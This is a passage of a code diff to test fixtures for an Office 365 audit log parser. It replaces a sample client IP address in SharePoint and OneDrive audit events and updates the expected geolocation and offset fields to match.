-{"ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "ItemType": "Page", "Workload": "OneDrive", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "UserId": "asr@testsiem.onmicrosoft.com", "CreationTime": "2020-02-07T16:43:53", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "ClientIP": "213.97.47.133", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "UserType": 0, "Version": 1, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "CustomUniqueId": true, "Operation": "PageViewed", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "RecordType": 4}
-{"UserId": "asr@testsiem.onmicrosoft.com", "ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "RecordType": 4, "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "Workload": "OneDrive", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "UserType": 0, "CreationTime": "2020-02-07T16:43:53", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "ClientIP": "213.97.47.133", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "Version": 1, "EventSource": "SharePoint", "CustomUniqueId": true, "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "Operation": "PageViewed", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "ItemType": "Page"}
-{"Workload": "OneDrive", "Version": 1, "RecordType": 4, "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "UserId": "asr@testsiem.onmicrosoft.com", "CreationTime": "2020-02-07T16:43:53", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "UserType": 0, "ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "CustomUniqueId": true, "ClientIP": "213.97.47.133", "Operation": "PageViewed", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "ItemType": "Page"}
+{"ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "ItemType": "Page", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "Workload": "OneDrive", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "UserId": "asr@testsiem.onmicrosoft.com", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "CustomUniqueId": true, "UserType": 0, "Version": 1, "EventSource": "SharePoint", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "81.2.69.143", "Operation": "PageViewed", "CreationTime": "2020-02-07T16:43:53", "RecordType": 4}
+{"ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "ItemType": "Page", "Workload": "OneDrive", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "UserId": "asr@testsiem.onmicrosoft.com", "CreationTime": "2020-02-07T16:43:53", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "ClientIP": "81.2.69.143", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "UserType": 0, "Version": 1, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "CustomUniqueId": true, "Operation": "PageViewed", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "RecordType": 4}
+{"UserId": "asr@testsiem.onmicrosoft.com", "ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "RecordType": 4, "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "Workload": "OneDrive", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "UserType": 0, "CreationTime": "2020-02-07T16:43:53", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "ClientIP": "81.2.69.143", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "Version": 1, "EventSource": "SharePoint", "CustomUniqueId": true, "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "Operation": "PageViewed", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "ItemType": "Page"}
+{"Workload": "OneDrive", "Version": 1, "RecordType": 4, "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "UserId": "asr@testsiem.onmicrosoft.com", "CreationTime": "2020-02-07T16:43:53", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "UserType": 0, "ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "CustomUniqueId": true, "ClientIP": "81.2.69.143", "Operation": "PageViewed", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "ItemType": "Page"}
diff --git a/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log-expected.json b/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log-expected.json
index 04d66f454bc8..ff9712cdcc70 100644
--- a/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log-expected.json
+++ b/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log-expected.json
@@ -1,8 +1,8 @@
 [
     {
         "@timestamp": "2020-02-07T16:43:53.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "PageViewed",
         "event.category": "web",
         "event.code": "SharePoint",
@@ -19,7 +19,7 @@
         "input.type": "log",
         "log.offset": 0,
         "network.type": "ipv4",
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25",
         "o365.audit.CreationTime": "2020-02-07T16:43:53",
         "o365.audit.CustomUniqueId": true,
@@ -40,20 +40,18 @@
         "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
         "o365.audit.Workload": "OneDrive",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -71,8 +69,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:43:53.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "PageViewed",
         "event.category": "web",
         "event.code": "SharePoint",
@@ -87,9 +85,9 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 870,
+        "log.offset": 868,
         "network.type": "ipv4",
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25",
         "o365.audit.CreationTime": "2020-02-07T16:43:53",
         "o365.audit.CustomUniqueId": true,
@@ -110,20 +108,18 @@
         "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
         "o365.audit.Workload": "OneDrive",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -141,8 +137,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:43:53.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "PageViewed",
         "event.category": "web",
         "event.code": "SharePoint",
@@ -157,9 +153,9 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 1740,
+        "log.offset": 1736,
         "network.type": "ipv4",
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25",
         "o365.audit.CreationTime": "2020-02-07T16:43:53",
         "o365.audit.CustomUniqueId": true,
@@ -180,20 +176,18 @@
         "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
         "o365.audit.Workload": "OneDrive",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -211,8 +205,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:43:53.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "PageViewed",
         "event.category": "web",
         "event.code": "SharePoint",
@@ -227,9 +221,9 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 2610,
+        "log.offset": 2604,
         "network.type": "ipv4",
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25",
         "o365.audit.CreationTime": "2020-02-07T16:43:53",
         "o365.audit.CustomUniqueId": true,
@@ -250,20 +244,18 @@
         "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
         "o365.audit.Workload": "OneDrive",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
diff --git a/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log b/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log
index bc5573e588db..cc5dd5aeb1a4 100644
--- a/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log
+++ b/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log
@@ -1,11 +1,11 @@
-{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:07", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "SourceRelativeUrl": "Documents", "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "213.97.47.133", "CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot 2020-01-27 at 11.30.48.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ItemType": "File", "ListItemUniqueId": "4803608a-df7d-4f63-aa73-67aa33bb576e", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Version": 1, "Operation": "FileDeleted", "Id": "ec04aa09-0a43-4879-cdc8-08d7abecf327"}
-{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:07", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents", "ItemType": "File", "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "213.97.47.133", "CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot 2020-01-27 at 11.30.48.png", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "RecordType": 6, "ListItemUniqueId": "4803608a-df7d-4f63-aa73-67aa33bb576e", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileDeleted", "Id": "ec04aa09-0a43-4879-cdc8-08d7abecf327"}
-{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:08", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents/Forms", "ItemType": "File", "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "aspx", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "213.97.47.133", "CorrelationId": "652b339f-90a0-a000-f25f-919afc141eb1", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "All.aspx", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "RecordType": 6, "ListItemUniqueId": "ff3631c1-6189-45c7-ad45-c15cea9e9255", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileAccessed", "Id": "25b08f04-48ee-4755-ce22-08d7abecf3a9"}
-{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:08", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents/Forms", "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "aspx", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "213.97.47.133", "CorrelationId": "652b339f-90a0-a000-f25f-919afc141eb1", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "All.aspx", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ItemType": "File", "ListItemUniqueId": "ff3631c1-6189-45c7-ad45-c15cea9e9255", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileAccessed", "Id": "25b08f04-48ee-4755-ce22-08d7abecf3a9"}
-{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:21", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents", "ImplicitShare": "No", "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "213.97.47.133", "CorrelationId": "692b339f-c016-a000-f25f-990a07b2e011", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ItemType": "File", "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileUploaded", "Id": "dac93a9f-f2fb-4cac-d18f-08d7abecfbb6"}
-{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:23", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents", "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "213.97.47.133", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot.png", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ItemType": "File", "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileModified", "Id": "5b02fadb-8eac-4aff-af87-08d7abecfca3"}
-{"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:07", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "213.97.47.133", "CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "SourceFileName": "Screenshot 2020-01-27 at 11.30.48.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ItemType": "File", "ListItemUniqueId": "4803608a-df7d-4f63-aa73-67aa33bb576e", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileDeleted", "Id": "ec04aa09-0a43-4879-cdc8-08d7abecf327"}
-{"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:21", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "ImplicitShare": "No", "ItemType": "File", "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "213.97.47.133", "CorrelationId": "692b339f-c016-a000-f25f-990a07b2e011", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "SourceFileName": "Screenshot.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "RecordType": 6, "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileUploaded", "Id": "dac93a9f-f2fb-4cac-d18f-08d7abecfbb6"}
-{"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:23", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "ItemType": "File", "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "213.97.47.133", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "RecordType": 6, "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Version": 1, "Operation": "FileModified", "Id": "5b02fadb-8eac-4aff-af87-08d7abecfca3"}
-{"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:23", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "ItemType": "File", "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "213.97.47.133", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "SourceFileName": "Screenshot.png", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "RecordType": 6, "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileModified", "Id": "5b02fadb-8eac-4aff-af87-08d7abecfca3"}
-{"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:23", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "213.97.47.133", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "SourceFileName": "Screenshot.png", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ItemType": "File", "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileModified", "Id": "5b02fadb-8eac-4aff-af87-08d7abecfca3"}
